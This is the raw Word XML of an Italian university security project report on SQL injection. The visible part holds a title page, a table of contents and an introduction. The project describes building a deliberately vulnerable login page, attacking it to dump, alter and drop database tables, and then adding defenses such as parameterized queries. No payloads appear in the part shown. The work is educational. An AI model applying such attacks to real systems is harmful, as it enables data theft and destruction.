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F29D" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D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71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7122"/>
      </w:tblGrid>
      <w:tr w:rsidR="00106D47" w14:paraId="7A6B8AAA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="276"/>
          <w:jc w:val="center"/>
        </w:trPr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</w:tcPr>
          <w:p w14:paraId="142F6CBF" w14:textId="77777777" w:rsidR="00106D47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Università degli Studi di Roma “La Sapienza”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106D47" w14:paraId="253CB7AB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="276"/>
          <w:jc w:val="center"/>
        </w:trPr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</w:tcPr>
          <w:p w14:paraId="0AB38D34" w14:textId="77777777" w:rsidR="00106D47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Laurea Triennale in INFORMATICA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106D47" w14:paraId="17498140" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="276"/>
          <w:jc w:val="center"/>
        </w:trPr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</w:tcPr>
          <w:p w14:paraId="255EE24E" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
            <w:pPr>
              <w:spacing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  <w:p w14:paraId="441C933E" w14:textId="77777777" w:rsidR="00106D4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Insegnamento di </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106D47" w14:paraId="0EB7CAA8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="276"/>
          <w:jc w:val="center"/>
        </w:trPr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</w:tcPr>
          <w:p w14:paraId="79F031EA" w14:textId="77777777" w:rsidR="00106D4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Sicurezza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00106D47" w14:paraId="739FD183" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="527"/>
          <w:jc w:val="center"/>
        </w:trPr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</w:tcPr>
          <w:p w14:paraId="3BE65132" w14:textId="77777777" w:rsidR="00106D47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Prof. Emiliano Casalicchio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC5AD8E" w14:textId="77777777" w:rsidR="00106D47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 2025-2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55357FE1" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0077CD28" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F063906" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC64536" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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 E L A Z I O N E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A3080" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680374BE" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A2797C" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>di progetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1B696E" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A88391" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CC2D04" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7B60B" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Corso: Presenza MZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F7153" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEB793B" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1396C4D9" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0A686A" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C546B19" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9D6796" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9BC699" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551EC501" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1878A702" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67ABC3ED" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438850E3" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F93DC9F" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46839687" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41329FEB" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gruppo di Lavoro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5174B34B" w14:textId="24FB6108" w:rsidR="00106D47" w:rsidRDefault="00106D47" w:rsidP="0029686E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050F2D4D" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pagliaccia Francesco 2057798</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F9B31" w14:textId="4624F600" w:rsidR="00106D47" w:rsidRDefault="0029686E" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Eros </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079E4B4" w14:textId="70B51B3C" w:rsidR="0029686E" w:rsidRDefault="0029686E" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kenneth Privado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150555C" w14:textId="77777777" w:rsidR="0029686E" w:rsidRDefault="0029686E" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D990671" w14:textId="77777777" w:rsidR="004D0DD8" w:rsidRDefault="004D0DD8" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DA1DEA" w14:textId="77777777" w:rsidR="00BA17DA" w:rsidRDefault="00BA17DA" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ED40AF" w14:textId="77777777" w:rsidR="00BA17DA" w:rsidRDefault="00BA17DA" w:rsidP="004D0DD8">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76118090" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>INDICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E0562" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1506630572"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2A1D133F" w14:textId="0E6AE5BC" w:rsidR="00124EDB" w:rsidRDefault="00CD426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79405" w:history="1">
            <w:r w:rsidR="00124EDB" w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUZIONE</w:t>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc232079405 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00124EDB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38782B5C" w14:textId="20F9FAAA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06" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Descrizione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4293B" w14:textId="1F4A9AFE" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079407" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TECNOLOGIE USATE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C136" w14:textId="10447EC3" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079408" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>REQUISITI e AVVIO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E2FF" w14:textId="0C9B6E6B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09" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Requisiti Minimi per il Funzionamento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3B2F" w14:textId="71726956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10" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Avvio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E5F4D" w14:textId="2B5D3CED" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079411" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>FUNZIONAMENTO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F607" w14:textId="4C16F021" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079412" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>SITO INDIFESO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D10FC" w14:textId="5495878E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13" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Invio Automatico dei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4DFE" w14:textId="0E3EC5FD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14" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Esempi di Attacchi di SQL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D6D4" w14:textId="02EDAD7A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15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Scoprire il DB (Confidenzialità violata)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366B" w14:textId="647DA4E1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16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Esfiltrare i dati contenuti nelle tabelle (Confidenzialità violata)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B7193" w14:textId="6DA8BE42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17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Modificare il contenuto delle tabelle (Integrità violata)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F1EB" w14:textId="4406263D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18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Cancellare una o più tabelle e il loro contenuto (Disponibilità e Integrità violata)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D6BDB" w14:textId="03C5207C" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079419" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>SITO DIFESO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A632" w14:textId="78C22C47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0" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Difese a Livello di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ACBF" w14:textId="75787989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1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Rimozione del Piggybacking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AFA65" w14:textId="60933974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2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Utilizzo delle Query Parametrizzate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DAD1" w14:textId="7D774089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3" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Difese a Livello di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73DE" w14:textId="39C1F5DE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4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Hashing delle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F3B9" w14:textId="287EFB98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5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Principio del “Least Privilege”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E582" w14:textId="0E509F00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6" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ulteriori Difese Analizzate ma Non Utilizzate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39C3F" w14:textId="33DBA50E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7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Limitare i tentativi di accesso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E591" w14:textId="21E13781" w:rsidR="00124EDB" w:rsidRDefault="00124EDB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="96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8" w:history="1">
            <w:r w:rsidRPr="00983AAD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983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rimozione di caratteri speciali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CCDC" w14:textId="248ED667" w:rsidR="00124EDB" w:rsidRDefault="00124EDB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2079429" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tentativo di Invio dei Payloads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DDF3" w14:textId="750A522D" w:rsidR="00124EDB" w:rsidRDefault="00124ED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it-IT"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc232079430" w:history="1">
            <w:r w:rsidRPr="00983AAD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="it-IT"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CBB4" w14:textId="3E9E9ECD" w:rsidR="00106D47" w:rsidRDefault="00CD4263" w:rsidP="00CD4263">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9962"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="03215237" w14:textId="77777777" w:rsidR="001B6919" w:rsidRDefault="001B6919" w:rsidP="001B6919"/>
    <w:p w14:paraId="49531344" w14:textId="77777777" w:rsidR="001B6919" w:rsidRDefault="001B6919" w:rsidP="001B6919"/>
    <w:p w14:paraId="720C555D" w14:textId="77777777" w:rsidR="001B6919" w:rsidRDefault="001B6919" w:rsidP="001B6919"/>
    <w:p w14:paraId="03D437DF" w14:textId="77777777" w:rsidR="001B6919" w:rsidRPr="001B6919" w:rsidRDefault="001B6919" w:rsidP="001B6919"/>
    <w:p w14:paraId="76EAA03D" w14:textId="77777777" w:rsidR="00106D47" w:rsidRPr="00D555E5" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22123AEC" w14:textId="77777777" w:rsidR="00106D47" w:rsidRPr="004D0DD8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc232068338"/>
      <w:bookmarkStart w:id="1" w:name="_Toc232079405"/>
      <w:r w:rsidRPr="004D0DD8">
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUZIONE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="306B45D4" w14:textId="06F97881" w:rsidR="00106D47" w:rsidRPr="00D555E5" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc232068339"/>
      <w:bookmarkStart w:id="3" w:name="_Toc232079406"/>
      <w:r>
        <w:t>Descrizione Progetto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1E62A48B" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D01D954" w14:textId="23936C11" w:rsidR="00106D47" w:rsidRDefault="002953E6">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Progetto sulla realizzazione di una semplice pagina web di login vulnerabile ad attacchi di tipo SQL Injection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F2190" w14:textId="77777777" w:rsidR="0089124C" w:rsidRDefault="002953E6">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L’obiettivo è</w:t>
      </w:r>
      <w:r w:rsidR="0089124C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D538E" w14:textId="032AC3AD" w:rsidR="002953E6" w:rsidRDefault="0089124C" w:rsidP="0089124C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002953E6">
        <w:t>onoscere e recuperare/modificare, tramite comandi SQL, le informazioni del DB (anche non conoscendo in anticipo la struttura del DB), violando in questo modo le tre proprietà CIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB365C" w14:textId="5C65B99B" w:rsidR="0089124C" w:rsidRDefault="0089124C" w:rsidP="0089124C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implementare delle difese per bloccare questo tipo di attacchi e proteggere la pagina web e il DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03647142" w14:textId="77777777" w:rsidR="0089124C" w:rsidRDefault="0089124C" w:rsidP="0089124C">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349AD7CC" w14:textId="6C4C1CE2" w:rsidR="0089124C" w:rsidRDefault="0089124C" w:rsidP="00512F70">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Il progetto si divide in due parti:</w:t>
      </w:r>
      <w:r w:rsidR="00512F70">
        <w:t xml:space="preserve"> u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">na pagina web </w:t>
      </w:r>
      <w:r w:rsidR="00512F70">
        <w:t>priva di difese e una pagina web con le difese attive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB7442" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24123BDF" w14:textId="77777777" w:rsidR="00483468" w:rsidRDefault="00483468">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6568FFBF" w14:textId="0A7D543E" w:rsidR="00106D47" w:rsidRDefault="00483468" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc232068340"/>
      <w:bookmarkStart w:id="5" w:name="_Toc232079407"/>
      <w:r>
        <w:t>TECNOLOGIE USATE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6C8A3E6D" w14:textId="77777777" w:rsidR="00483468" w:rsidRDefault="00483468">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4D666A" w14:textId="3FBD86C2" w:rsidR="00512F70" w:rsidRDefault="00512F70" w:rsidP="00512F70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00512F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Frontend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00512F70">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTML, CSS e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00512F70">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00512F70">
